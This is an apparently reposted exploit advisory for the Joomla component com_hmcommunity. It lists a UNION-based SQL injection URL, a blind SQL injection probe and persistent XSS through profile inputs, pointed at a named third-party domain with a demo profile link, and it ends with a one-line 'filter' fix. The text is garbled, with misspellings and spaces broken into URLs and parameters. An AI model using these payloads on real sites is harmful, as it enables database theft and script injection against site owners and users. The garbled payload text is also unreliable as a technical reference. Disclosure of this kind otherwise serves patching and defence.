Title: Joomla Compenent com_hmcommunity Multiple Vulnerabilities
Software: Joomla
: Http://joomlaextensions.co.in/product/HM-Community
Author: 599eme Man www.2cto.com Flouf@live.fr
#
# [Renew]
#
# [+] Defect Analysis
#
# [+] SQL
#
#-Http://www.bkjia.com/index. php? Option = com_hmcommunity & view = fnd_home & id = [NB] union select all 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 --
#
# [+] Blind SQL
#
#-Http://www.bkjia.com // index. php? Option = com_hmcommunity & view = fnd_home & id = 155 and @ version = 5
#
# [+] Persistent XSS
#
#-The XSS is on the profile. You have to create an account and put your code in inputs.
#
# [+] Demo
#
#-Create an account and look this profile: http://www.bkjia.com/index. php? Option = com_hmcommunity & view = fnd_profile & uid = 155
#
# [Renew]
#
######################################## ######################################## #########################
Www.2cto.com solution:
It's nothing more than injection and xss. Filter